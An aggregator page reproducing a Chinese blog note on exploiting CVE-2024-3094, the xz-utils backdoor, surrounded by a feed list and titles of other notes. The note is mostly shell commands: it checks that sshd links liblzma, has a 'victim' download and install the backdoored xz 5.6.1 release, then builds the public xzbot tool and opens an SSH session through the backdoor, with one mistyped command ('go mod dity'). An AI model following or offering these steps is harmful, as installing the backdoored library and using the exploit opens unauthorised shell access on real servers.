惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

D
Docker
B
Blog RSS Feed
Microsoft Security Blog
Microsoft Security Blog
Y
Y Combinator Blog
N
Netflix TechBlog - Medium
M
MIT News - Artificial intelligence
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
B
Blog
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
C
Check Point Blog
The GitHub Blog
The GitHub Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
P
Proofpoint News Feed
Martin Fowler
Martin Fowler
大猫的无限游戏
大猫的无限游戏
GbyAI
GbyAI
博客园_首页
A
About on SuperTechFans
Blog — PlanetScale
Blog — PlanetScale
人人都是产品经理
人人都是产品经理
T
Tailwind CSS Blog
aimingoo的专栏
aimingoo的专栏
T
The Blog of Author Tim Ferriss
The Cloudflare Blog

6Jyc5p+a

【笔记】HermesAgent学习笔记 【笔记】DeepSeekHarness学习笔记 【笔记】Rollup的PluginBabel插件 【笔记】Rollup学习笔记 【笔记】Gulp的BrowserSync插件 【笔记】Node-SSH学习笔记 【笔记】Tapable学习笔记 【笔记】Highlight.js学习笔记 【笔记】Marked学习笔记 【笔记】Webpack通过schema-utils实现Loader参数校验 【笔记】Webpack实现TreeShaking 【笔记】Webpack的WebpackBundleAnalyzer插件 【代码】校验信用卡号码 【笔记】Webpack的SpeedMesureWebpackPlugin插件 【笔记】Codex配置Brave浏览器的MCP 【笔记】Webpack的CSSMinimizerWebpackPlugin插件 【笔记】FastNodeManager学习笔记 【笔记】Terser学习笔记 【笔记】Codex配置Wireshark的MCP 【笔记】Codex配置Unity的MCP 【笔记】Codex配置Blender的MCP 【笔记】Codex配置IDEA的MCP 【笔记】Browserslist学习笔记 【笔记】Codex学习笔记 【笔记】MicrosoftStore微软商店学习笔记 【笔记】通过NapCat和AstrBot实现QQ机器人 【笔记】部署NapCat 【笔记】部署AstrBot 【笔记】Poetry学习笔记 【笔记】uv学习笔记
【笔记】CVE-2024-3094漏洞利用
6Jyc5p+a · 2026-06-05 · via 6Jyc5p+a

前言

通过安装xz-utils的5.6.0版本或5.6.1版本实现ssh免密登录

漏洞利用前提

1
ldd $(which sshd) | grep lzma
1
liblzma.so.5 => /usr/lib/x86_64-linux-gnu/liblzma.so.5

受害者安装特定版本的xz

下载项目

1
2
3
wget https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.gz
tar -zxvf xz-5.6.1.tar.gz
cd xz-5.6.1

编译并安装

1
2
3
./configure
make
make install

查看版本号

1
xz --version
1
xz (XZ Utils) 5.6.1

攻击者通过后门私钥认证SSH

下载依赖

直接下载可执行文件

1
go install github.com/amlweems/xzbot@latest

手动编译

下载项目
1
2
git clone https://github.com/amlweems/xzbot.git
cd xzbot
编译
1
2
go mod dity
go build -o xzbot main.go
添加可执行权限
1
chmod +x xzbot

建立SSH连接

1
xzbot -addr "127.0.0.1:22"

完成